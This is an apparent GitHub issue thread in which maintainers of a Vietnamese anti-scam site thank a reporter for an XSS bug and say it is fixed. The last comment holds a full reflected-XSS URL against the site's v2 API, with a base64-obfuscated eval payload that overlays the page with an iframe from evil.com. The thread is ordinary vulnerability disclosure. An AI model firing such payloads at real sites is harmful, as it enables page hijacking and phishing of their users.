dshongphuc
commented
3 years ago Hi @tienbip1337, thank you so much for this contribution, we're fixing it :) If you have time, can you please do more pentest on the API v2?
Thanks in advance!
Closed tienbip1337 closed 3 years ago
dshongphuc
commented
3 years ago Hi @tienbip1337, thank you so much for this contribution, we're fixing it :) If you have time, can you please do more pentest on the API v2?
Thanks in advance!
januaryofmine
commented
3 years ago Thanks @tienbip1337, we done for XSS bug.
https://api.chongluadao.vn/v2/%3Cimg%20src=a%20onerror=eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPSdodHRwczovL2V2aWwuY29tJyB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjwvaWZyYW1lPiIp'))%3E